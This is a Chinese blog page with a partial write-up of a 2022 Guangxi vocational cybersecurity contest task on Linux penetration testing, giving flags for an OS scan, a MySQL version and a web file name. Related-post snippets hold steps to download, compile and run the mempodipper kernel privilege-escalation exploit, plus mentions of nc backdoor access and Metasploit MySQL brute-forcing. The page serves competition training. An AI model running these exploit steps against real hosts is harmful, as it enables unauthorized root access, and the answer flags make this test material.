2022年广西壮族自治区中职网络安全技能竞赛“Linux操作系统渗透测试详解”

已于 2024-09-06 19:36:19 修改
阅读量5.3k 收藏 3
点赞数 2
分类专栏: 网络安全职业技能大赛任务解析 文章标签: 服务器 linux 数据库 安全
于 2022-10-16 12:43:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/127346249
版权
本文介绍了2022年广西壮族自治区中职网络安全技能竞赛中的Linux操作系统渗透测试环节。参赛者使用Kali Linux平台,针对服务器上的Linux系统进行OS扫描、服务及版本检测、文件查找等任务,以获取特定FLAG,涉及MySQL数据库、HTML文件内容、BMP文件等关键信息。
摘要由CSDN通过智能技术生成

Linux操作系统渗透测试

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;

Flag: Linux 2.6.32 - 3.10

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;

Flag: MySQL 5.1.73-log

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交;  

Flag:loginmanager<

了解本专栏 订阅专栏 解锁全文
江西省省赛中职网络安全-Linux操作系统渗透测试
weixin_48800344的博客
12-14 3405
任务环境说明:  服务器场景:Server06  服务器场景操作系统Linux(版本不详) (关闭连接) 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交; 发现后门直接nc连接也可以 通过上面的服务渗透但现在以这个漏洞为主 通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交; mv移动到网站目
2023中职组“网络安全赛项广西自治区竞赛任务书A模块解析(详细)
最新发布
旺仔Sec&blog
03-11 687
2023中职组“网络安全赛项广西自治区竞赛任务书A模块解析(详细)
2022广西壮族自治区第二届职业技能大赛“网络安全项目”任务书
10-24
2022广西壮族自治区第二届职业技能大赛“网络安全项目”比赛任务书 需求环境或者FLAG可以私信我
E119-经典赛题-Linux操作系统渗透测试.docx
01-13
Prac9经典赛题;Linux操作系统渗透测试
[渗透测试篇]主机操作系统渗透之浅谈Linux提权
qq_43668710的博客
04-18 1131
前言 为何而写 其实这篇博客的出现是因为上一篇关于Vulnhub靶机系列的DC-1才决定来写的,因为在那篇文章中针对靶机的姿势涉及到了我的知识盲区----提权.于是,不允许放任自己"无知"的我,决定了这篇文章的诞生,以记录我对linux提权的学习和认知! 提权圣经 附:文章开始正文开始之前先给大家安利一篇出自大神g0tmi1k之手的Linux提权圣经Basic Linux Privilege Es...
ChinaSkills-网络系统管理(2021全国职业院校技能大赛A-1 模块 A:Linux 环境 评分标准 )
热门推荐
冷色调的夏天的博客
03-16 1万+
随着近国家对技术性的比赛越来越重视,各类技能大赛举办的相较正规,这类大赛一般是在专科中专等技术性高中等院校中选拔优秀人才,并且技能大赛的一等奖选手将有资格保送本科,希望一些有能力的专科生抓住这个机会,圆你一个本科梦。
最新2022广西壮族自治区道路矢量图层shp格式数据下载
06-06
本文将详细讲解与"最新2022广西壮族自治区道路矢量图层shp格式数据下载"相关的GIS(地理信息系统)知识,包括矢量数据、道路图层、坐标系以及shp文件格式等内容。 首先,GIS是一种用于处理、分析、展示地理空间...
2022最新广西壮族自治区五级行政区划代码
08-05
1、广西壮族自治区统计用区划代码和城乡划分代码更新维护的标准时点为202110月31日 2、此次发布内容为2021广西壮族自治区统计用区划代码(12位)和城乡分类代码(3位)
山东省2021网络系统管理赛项linux模块之client部分与一些基础部分
qq_47730784的博客
03-19 954
clinet和其他基础部分clinet部分答案设置分辨率安装各种工具其他一些基础部分安装源hostname FQDN 本文仅做个人分享,并不能保证内容全部正确,如有错误还请大佬指出,一起分享探讨学习交流. 21正式赛题下载地址 clinet部分答案 要求 正确安装和配置ip之前文章有过讲解,这里不做过多赘述,只是注意在比赛安装时一定要选择英文,安装部分功能除了client勾选gnome桌面,其他默认(默认勾选的desktop要去掉) 设置分辨率 直接鼠标右键选择Display Settings 直接
模拟搭建2022网络系统管理比赛Linux模块的环境
Beau_Will的博客
03-20 3263
由于国赛通知,今Linux模块需要使用centos7以上或者统信UOS系统。 之前还准备了很久的debian10,真是心累。 准备工作 准备四台centos7.5的虚拟机,ssh工具使用SecureCRT 其中Rserver作为路由转发的服务器 其他三台分别为各自网段的服务器或者客户机 1.物理主机的虚拟网卡ip规划 因为有三个网段,则需要准备三张虚拟网卡,我这里使用vmnet0(即自己的物理网卡)、vmnet1以及vmnet8 虚拟网卡 ip/掩码 vmnet0
山东省2021网络系统管理赛项linux模块之Rserver部分
qq_47730784的博客
03-20 2023
Rserver答案参考题目iptablessquiddhcpCA 本文仅做个人分享,并不能保证内容全部正确,如有错误还请大佬指出,一起分享探讨学习交流. 21正式赛题下载地址 题目 iptables 1 iptables -P INPUT DROP #默认阻止流量 2 https://blog.csdn.net/jk110333/article/details/8229828 #这里给出参考链接 我也不确定此题解法 需要根据实际ip作题 3 iptables -I INPUT -p tcp --dpor
linux2.6.32漏洞,Linux 2.6.39 到 3.2.0 爆提权漏洞
weixin_33448555的博客
05-16 483
1.下载漏洞利用文件wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c2.编译gcc mempodipper.c -o mempodipper3.执行前察看netcat@netcat:~$ uname -r3.0.0-12-genericnetcat@netcat:~$ cat /etc/issueUbuntu 11.10 n l...
Docker安装升级linux内核(2.6.32->3.10.105),安装成功!
u014057054的专栏
05-18 3475
升级linux内核(2.6.32->3.10.105),安装docker 1.内核升级环境准备 #查看已经安装的和未安装的软件包组,来判断我们是否安装了相应的开发环境和开发库; yum grouplist                         #一般是安装这两个软件包组,这样做会确定你拥有编译时所需的一切工具 yum groupinstall "Developme
CentOS 6.x 内核升级(2.6.32 - 3.10.58)过程记录
01-04 297
本人升级的目的是想在CentOS6.2上运行docker,官方建议内核版本在3.8.0及以上,于是就自己从Linux内核官方网站上下载源码,自己编译。 1. 准备工作 确认内核及版本信息 [root@hostname ~]# uname -r 2.6.32-220.el6.x86_64 [root@hostname ~]# cat /etc/centos-release CentOS
2021中职网络安全“江西省赛题—B-2:Linux操作系统渗透测试
weixin_57060854的博客
05-23 5965
2021中职"网络安全"江西省赛题—B-2:Linux操作系统渗透测试学习交流B-2:Linux操作系统渗透测试 学习交流 学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542 B-2:Linux操作系统渗透测试 任务环境说明:  服务器场景:Server06  服务器场景操作系统Linux(版本不详)(关闭连接) nmap -p- -sV ip 扫描靶机端口 使用命令msfconsole打开Metasploit渗透测试平台,使用search命令搜索模块mysql暴力破解模
全国职业大赛网络系统管理赛项Linux(centos+uos)模块开篇语
whall_fall的博客
11-07 1107
全国职业院校技能大赛,是教育部发起并牵头,联合国务院有关部门以及有关行业、人民团体、学术团体和地方共同举办的一项公益性、全国性职业院校学生综合技能竞赛活动。每举办一届。[1]为充分展示职业教育改革发展的丰硕成果,集中展现职业院校师生的风采,努力营造全社会关心、支持职业教育发展的良好氛围,促进职业院校与行业企业的产教结合,更好地为中国经济建设和社会发展服务。是专业覆盖面最广、参赛选手最多、社会影响最大、联合主办部门最全的国家级职业院校技能赛事。
Linux应急响应
不知名白帽的博客
06-18 1528
主要讲解关于Linux的一些快捷命令,用于应急响应,查看主机是否被入侵
广西壮族自治区行政区划数据解析与应用
资源摘要信息: "本资源是一组与中国省级行政区划相关的地理信息系统(GIS)数据文件,特指中国广西壮族自治区的shapefile(shp)数据集。GIS数据通常用于地图制作、地理分析以及与地理位置相关的数据展示。shapefile...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值